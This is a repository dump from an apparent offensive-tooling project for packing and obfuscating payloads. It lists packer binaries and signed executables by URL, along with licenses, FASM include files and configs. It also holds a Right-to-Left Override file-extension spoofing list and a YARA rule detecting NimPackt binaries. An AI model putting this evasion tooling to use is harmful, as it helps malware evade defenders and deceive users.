https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-PowerShellLauncher.ps1
--------------------------------------------------------------------------------
/contrib/Invoke-Obfuscation/Out-SecureStringCommand.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Invoke-Obfuscation/Out-SecureStringCommand.ps1
--------------------------------------------------------------------------------
/contrib/LoGIC.NET/LoGiC.NET.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/LoGIC.NET/LoGiC.NET.exe
--------------------------------------------------------------------------------
/contrib/LoGIC.NET/LoGiC.NET.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/contrib/LoGIC.NET/SharpConfigParser.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/LoGIC.NET/SharpConfigParser.dll
--------------------------------------------------------------------------------
/contrib/LoGIC.NET/dnlib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/LoGIC.NET/dnlib.dll
--------------------------------------------------------------------------------
/contrib/MPRESS/BugReport.txt:
--------------------------------------------------------------------------------
1 |
2 | MATCODE Compressor
3 | ~~~~~~~~~~~~~~~~~~
4 | Reporting Problems and Receiving Support
5 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
6 |
7 | At first make sure that the problem you have encountered while packing
8 | or executing compressed application is not an ordinary situation or a known
9 | problem: see MPRESS ReadMe, TechInfo. Only if the problem is not known, send
10 | an email to ve@matcode.com, otherwise there's no need to produce extra
11 | traffic, it does not stimulate developers in any way.
12 | In your email specify the conditions to reproduce the problem:
13 | what file caused the problem (where to get it). You should attach
14 | the file to your message, only if the file size does not exceed 400k.
15 | A general notice concerning files attached - it is specific to the
16 | mailserver that any files attached with .exe, .dll, .sys, .ocx, .cpl,
17 | .scr, ... etc. executable extensions are removed. So, before sending
18 | such files to matcode.com, you should archive them first.
19 |
20 | MATCODE Software,
21 | info@matcode.com
22 |
23 |
--------------------------------------------------------------------------------
/contrib/MPRESS/license.txt:
--------------------------------------------------------------------------------
1 |
2 | MPRESS Matcode comPRESSor
3 | Copyright (c) 2007-2009, Vitaly Evseenko, MATCODE Software
4 | All rights reserved.
5 |
6 | This program is free for commercial and non-commercial use as long as
7 | the following conditions are aheared to.
8 |
9 | Copyright remains Vitaly Evseenko (MATCODE Software), and as such any
10 | Copyright notices in the code are not to be removed.
11 |
12 | Redistribution and use, without modification, is permitted and reproduce
13 | the above copyright notice and the following disclaimer in the
14 | documentation and/or other materials provided with the distribution.
15 |
16 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
17 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
18 | TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
19 | PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
20 | CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
21 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
22 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
23 | PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
24 | LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
25 | NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
26 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
27 |
28 | The licence and distribution terms for any publically available
29 | version of this program cannot be changed. i.e. this program
30 | cannot simply be copied and put under another distribution licence
31 |
--------------------------------------------------------------------------------
/contrib/MPRESS/mpress.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/MPRESS/mpress.exe
--------------------------------------------------------------------------------
/contrib/Mangle/Mangle.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/Mangle.exe
--------------------------------------------------------------------------------
/contrib/Mangle/sigcheck.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/sigcheck.exe
--------------------------------------------------------------------------------
/contrib/Mangle/signed-executables/WINWORD.EXE:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/signed-executables/WINWORD.EXE
--------------------------------------------------------------------------------
/contrib/Mangle/signed-executables/autorunsc64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/signed-executables/autorunsc64.exe
--------------------------------------------------------------------------------
/contrib/Mangle/signed-executables/notepad.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/signed-executables/notepad.exe
--------------------------------------------------------------------------------
/contrib/Mangle/signed-executables/svchost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Mangle/signed-executables/svchost.exe
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2022 Cas van Cooten (@chvancooten)
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/NimPackt.yar:
--------------------------------------------------------------------------------
1 | rule HKTL_Nim_NimPackt : EXE FILE HKTL
2 | {
3 | meta:
4 | description = "Detects binaries generated with NimPackt v1"
5 | author = "Cas van Cooten"
6 | reference = "https://github.com/chvancooten/NimPackt-v1"
7 | date = "2022-01-26"
8 |
9 | strings:
10 | $nim1 = "fatal.nim" ascii fullword
11 | $nim2 = "winim" ascii
12 | $np1 = { 4E 69 6D 50 61 63 6B 74 }
13 | $sus1 = { 61 6D 73 69 00 00 00 00 B8 57 00 07 80 C3 }
14 | $sus2 = { 5B 2B 5D 20 49 6E 6A 65 63 74 65 64 }
15 | $sus3 = { 5C 2D 2D 20 62 79 74 65 73 20 77 72 69 74 74 65 6E 3A }
16 |
17 | condition:
18 | uint16(0) == 0x5A4D and
19 | filesize < 750KB and
20 | 1 of ($nim*) and (
21 | $np1 or 2 of ($sus*)
22 | )
23 | }
24 |
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/assets/AntiScan-Results-CSBeacon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/NimPackt-v1/assets/AntiScan-Results-CSBeacon.png
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/assets/Nimpackt-Logo-Blacktext.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/NimPackt-v1/assets/Nimpackt-Logo-Blacktext.png
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/assets/cna_plugin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/NimPackt-v1/assets/cna_plugin.png
--------------------------------------------------------------------------------
/contrib/NimPackt-v1/dist/shellycoat_x64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/NimPackt-v1/dist/shellycoat_x64.bin
--------------------------------------------------------------------------------
/contrib/Nimcrypt2/nimcrypt.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Nimcrypt2/nimcrypt.exe
--------------------------------------------------------------------------------
/contrib/PEunion/Config/recent.ini:
--------------------------------------------------------------------------------
1 | [projects]
2 | 1 = D:\dev2\ProtectMyTooling\contrib\_project-files\PEunion\dotnet86.peu
3 | 2 = D:\dev2\ProtectMyTooling\contrib\_project-files\PEunion\native32.peu
4 |
--------------------------------------------------------------------------------
/contrib/PEunion/Config/rtlo_extension_alternatives.ini:
--------------------------------------------------------------------------------
1 | ; List of extensions that are known for interchangeability
2 | ; Used in Right-to-Left Override tool
3 |
4 | [alternative]
5 | extension = exe
6 | extension = scr
7 |
8 | [alternative]
9 | extension = jpg
10 | extension = jpeg
11 |
12 | [alternative]
13 | extension = mid
14 | extension = midi
--------------------------------------------------------------------------------
/contrib/PEunion/Config/viewstate.ini:
--------------------------------------------------------------------------------
1 | [window]
2 | x = 560
3 | y = 160
4 | width = 1440
5 | height = 1080
6 | maximized = false
7 | splitter2 = 260
8 |
9 | [text_dialog]
10 |
11 | [help_dialog]
12 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/FASM.EXE:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/FASM/FASM.EXE
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/API/COMDLG32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMDLG32 API calls
3 |
4 | import comdlg32,\
5 | ChooseColorA,'ChooseColorA',\
6 | ChooseColorW,'ChooseColorW',\
7 | ChooseFontA,'ChooseFontA',\
8 | ChooseFontW,'ChooseFontW',\
9 | CommDlgExtendedError,'CommDlgExtendedError',\
10 | FindTextA,'FindTextA',\
11 | FindTextW,'FindTextW',\
12 | FormatCharDlgProc,'FormatCharDlgProc',\
13 | GetFileTitleA,'GetFileTitleA',\
14 | GetFileTitleW,'GetFileTitleW',\
15 | GetOpenFileNameA,'GetOpenFileNameA',\
16 | GetOpenFileNameW,'GetOpenFileNameW',\
17 | GetSaveFileNameA,'GetSaveFileNameA',\
18 | GetSaveFileNameW,'GetSaveFileNameW',\
19 | LoadAlterBitmap,'LoadAlterBitmap',\
20 | PageSetupDlgA,'PageSetupDlgA',\
21 | PageSetupDlgW,'PageSetupDlgW',\
22 | PrintDlgA,'PrintDlgA',\
23 | PrintDlgW,'PrintDlgW',\
24 | ReplaceTextA,'ReplaceTextA',\
25 | ReplaceTextW,'ReplaceTextW',\
26 | WantArrows,'WantArrows',\
27 | dwLBSubclass,'dwLBSubclass',\
28 | dwOKSubclass,'dwOKSubclass'
29 |
30 | api ChooseColor,\
31 | ChooseFont,\
32 | FindText,\
33 | GetFileTitle,\
34 | GetOpenFileName,\
35 | GetSaveFileName,\
36 | PageSetupDlg,\
37 | PrintDlg,\
38 | ReplaceText
39 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1250.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1250
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,160h,2039h,15Ah,164h,17Dh,179h
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,161h,203Ah,15Bh,165h,17Eh,17Ah
12 | dw 0A0h,2C7h,2D8h,141h,0A4h,104h,0A6h,0A7h,0A8h,0A9h,15Eh,0ABh,0ACh,0ADh,0AEh,17Bh
13 | dw 0B0h,0B1h,2DBh,142h,0B4h,0B5h,0B6h,0B7h,0B8h,105h,15Fh,0BBh,13Dh,2DDh,13Eh,17Ch
14 | dw 154h,0C1h,0C2h,102h,0C4h,139h,106h,0C7h,10Ch,0C9h,118h,0CBh,11Ah,0CDh,0CEh,10Eh
15 | dw 110h,143h,147h,0D3h,0D4h,150h,0D6h,0D7h,158h,16Eh,0DAh,170h,0DCh,0DDh,162h,0DFh
16 | dw 155h,0E1h,0E2h,103h,0E4h,13Ah,107h,0E7h,10Dh,0E9h,119h,0EBh,11Bh,0EDh,0EEh,10Fh
17 | dw 111h,144h,148h,0F3h,0F4h,151h,0F6h,0F7h,159h,16Fh,0FAh,171h,0FCh,0FDh,163h,2D9h
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1251.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1251
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 401h,403h,201Ah,453h,201Eh,2026h,2020h,2021h,20ACh,2030h,409h,2039h,40Ah,40Ch,40Bh,40Fh
11 | dw 452h,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,459h,203Ah,45Ah,45Ch,45Bh,45Fh
12 | dw 0A0h,40Eh,45Eh,408h,0A4h,490h,0A6h,0A7h,401h,0A9h,404h,0ABh,0ACh,0ADh,0AEh,407h
13 | dw 0B0h,0B1h,406h,456h,491h,0B5h,0B6h,0B7h,451h,2116h,454h,0BBh,458h,405h,455h,457h
14 | times 40h dw 410h+%-1
15 | end virtual
16 |
17 | macro du [arg]
18 | { local offset,char
19 | offset = $-$$
20 | du arg
21 | if arg eqtype ''
22 | repeat ($-offset-$$)/2
23 | load char byte from $$+offset+(%-1)*2
24 | if char > 7Fh
25 | load char word from __encoding:char*2
26 | store word char at $$+offset+(%-1)*2
27 | end if
28 | end repeat
29 | end if }
30 |
31 | struc du [args]
32 | { common label . word
33 | du args }
34 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1252.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1252
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,17D,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,17Eh,178h
12 | times 60h dw 0A0h+%-1
13 | end virtual
14 |
15 | macro du [arg]
16 | { local offset,char
17 | offset = $-$$
18 | du arg
19 | if arg eqtype ''
20 | repeat ($-offset-$$)/2
21 | load char byte from $$+offset+(%-1)*2
22 | if char > 7Fh
23 | load char word from __encoding:char*2
24 | store word char at $$+offset+(%-1)*2
25 | end if
26 | end repeat
27 | end if }
28 |
29 | struc du [args]
30 | { common label . word
31 | du args }
32 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1253.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1253
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,?,?,?
12 | dw 0A0h,385h,386h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,?,0ABh,0ACh,0ADh,0AEh,2015h
13 | dw 0B0h,0B1h,0B2h,0B3h,384h,0B5h,0B6h,0B7h,288h,389h,38Ah,0BBh,38Ch,0BDh,38Eh,38Fh
14 | times 40h dw 390h+%-1
15 | end virtual
16 |
17 | macro du [arg]
18 | { local offset,char
19 | offset = $-$$
20 | du arg
21 | if arg eqtype ''
22 | repeat ($-offset-$$)/2
23 | load char byte from $$+offset+(%-1)*2
24 | if char > 7Fh
25 | load char word from __encoding:char*2
26 | store word char at $$+offset+(%-1)*2
27 | end if
28 | end repeat
29 | end if }
30 |
31 | struc du [args]
32 | { common label . word
33 | du args }
34 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1254.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1254
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,?,178h
12 | times 30h dw 0A0h+%-1
13 | dw 11Eh,0D1h,0D2h,0D3h,0D4h,0D5h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,130h,15Eh,0DFh
14 | times 10h dw 0E0h+%-1
15 | dw 11Fh,0F1h,0F2h,0F3h,0F4h,0F5h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,131h,15Fh,0FFh
16 | end virtual
17 |
18 | macro du [arg]
19 | { local offset,char
20 | offset = $-$$
21 | du arg
22 | if arg eqtype ''
23 | repeat ($-offset-$$)/2
24 | load char byte from $$+offset+(%-1)*2
25 | if char > 7Fh
26 | load char word from __encoding:char*2
27 | store word char at $$+offset+(%-1)*2
28 | end if
29 | end repeat
30 | end if }
31 |
32 | struc du [args]
33 | { common label . word
34 | du args }
35 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1255.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1255
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,?,?,?,?
12 | dw 0A0h,0A1h,0A2h,0A3h,20AAh,0A5h,0A6h,0A7h,0A8h,0A9h,0D7h,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0F7h,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 5B0h,5B1h,5B2h,5B3h,5B4h,5B5h,5B6h,5B7h,5B8h,5B9h,?,5BBh,5BCh,5BDh,5BEh,5BFh
15 | dw 5C0h,5C1h,5C2h,5C3h,5F0h,5F1h,5F2h,5F3h,5F4h,?,?,?,?,?,?,?
16 | dw 5D0h,5D1h,5D2h,5D3h,5D4h,5D5h,5D6h,5D7h,5D8h,5D9h,5DAh,5DBh,5DCh,5DDh,5DEh,5DFh
17 | dw 5E0h,5E1h,5E2h,5E3h,5E4h,5E5h,5E6h,5E7h,5E8h,5E9h,5EAh,?,?,200Eh,200Fh,?
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1256.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1256
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,67Eh,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,679h,2039h,152h,686h,698h,688h
11 | dw 6AFh,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,6A9h,2122h,691h,203Ah,153h,200Ch,200Dh,6BAh
12 | dw 0A0h,60Ch,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,6BEh,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 6C1h,621h,622h,623h,624h,625h,626h,627h,628h,629h,62Ah,62Bh,62Ch,62Dh,62Eh,62Fh
15 | dw 630h,631h,632h,633h,634h,635h,636h,0D7h,637h,638h,639h,63Ah,640h,641h,642h,643h
16 | dw 0E0h,644h,0E2h,645h,646h,647h,648h,0E7h,0E8h,0E9h,0EAh,0EBh,649h,64Ah,0EEh,0EFh
17 | dw 64Bh,64Ch,64Dh,64Eh,0F4h,64Fh,650h,0F7h,651h,0F9h,652h,0FBh,0FCh,200Eh,200Fh,6D2h
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1257.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1257
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,0A8h,2C7h,0B8h
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,0AFh,2DBh,?
12 | dw 0A0h,?,0A2h,0A3h,0A4h,?,0A6h,0A7h,0D8h,0A9h,156h,0ABh,0ACh,0ADh,0AEh,0C6h
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0F8h,0B9h,157h,0BBh,0BCh,0BDh,0BEh,0E6h
14 | dw 104h,12Eh,100h,106h,0C4h,0C5h,118h,112h,10Ch,0C9h,179h,116h,122h,136h,12Ah,13Bh
15 | dw 160h,143h,145h,0D3h,14Ch,0D5h,0D6h,0D7h,172h,141h,15Ah,16Ah,0DCh,17Bh,17Dh,0DFh
16 | dw 105h,12Fh,101h,107h,0E4h,0E5h,119h,113h,10Dh,0E9h,17Ah,117h,123h,137h,12Bh,13Ch
17 | dw 161h,144h,146h,0F3h,14Dh,0F5h,0F6h,0F7h,173h,142h,15Bh,16Bh,0FCh,17Ch,17Eh,2D9h
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1258.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1258
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,152h,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,153h,?,?,178h
12 | dw 0A0h,0A1h,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,0AAh,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 0C0h,0C1h,0C2h,102h,0C4h,0C5h,0C6h,0C7h,0C8h,0C9h,0CAh,0CBh,300h,0CDh,0CEh,0CFh
15 | dw 110h,0D1h,309h,0D3h,0D4h,1A0h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,1AFh,303h,0DFh
16 | dw 0E0h,0E1h,0E2h,103h,0E4h,0E5h,0E6h,0E7h,0E8h,0E9h,0EAh,0EBh,301h,0EDh,0EEh,0EFh
17 | dw 111h,0F1h,323h,0F3h,0F4h,1A1h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,1B0h,20ABh,0FFh
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN874.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 874
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,?,?,?,2026h,?,?,?,?,?,?,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,?,?,?,?,?,?,?
12 | times 60h dw 0E00h+%-1
13 | end virtual
14 |
15 | macro du [arg]
16 | { local offset,char
17 | offset = $-$$
18 | du arg
19 | if arg eqtype ''
20 | repeat ($-offset-$$)/2
21 | load char byte from $$+offset+(%-1)*2
22 | if char > 7Fh
23 | load char word from __encoding:char*2
24 | store word char at $$+offset+(%-1)*2
25 | end if
26 | end repeat
27 | end if }
28 |
29 | struc du [args]
30 | { common label . word
31 | du args }
32 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/COM32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for interfacing the COM (Component Object Model) classes
3 |
4 | macro cominvk object,proc,[arg]
5 | { common
6 | if ~ arg eq
7 | reverse
8 | pushd arg
9 | common
10 | end if
11 | assert defined object#.com.object ; must be a COM object
12 | mov eax,[object]
13 | push eax
14 | mov eax,[eax]
15 | call [eax+object#.#proc] }
16 |
17 | macro comcall handle,interface,proc,[arg]
18 | { common
19 | if ~ arg eq
20 | reverse
21 | pushd arg
22 | common
23 | end if
24 | assert defined interface#.com.interface ; must be a COM interface
25 | if handle eqtype eax | handle eqtype 0
26 | push handle
27 | local ..handle
28 | label ..handle at handle
29 | mov eax,[..handle]
30 | else
31 | mov eax,handle
32 | push eax
33 | mov eax,[eax]
34 | end if
35 | call [eax+interface#.#proc] }
36 |
37 | macro interface name,[proc]
38 | { common
39 | struc name \{
40 | match , @struct \\{ define field@struct .,name, \\}
41 | match no, @struct \\{ . dd ?
42 | virtual at 0
43 | forward
44 | .#proc dd ?
45 | common
46 | .\#\\.com.object = name#.com.interface
47 | end virtual \\} \}
48 | virtual at 0
49 | forward
50 | name#.#proc dd ?
51 | common
52 | name#.com.interface = $ shr 2
53 | end virtual }
54 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/COM64.INC:
--------------------------------------------------------------------------------
1 |
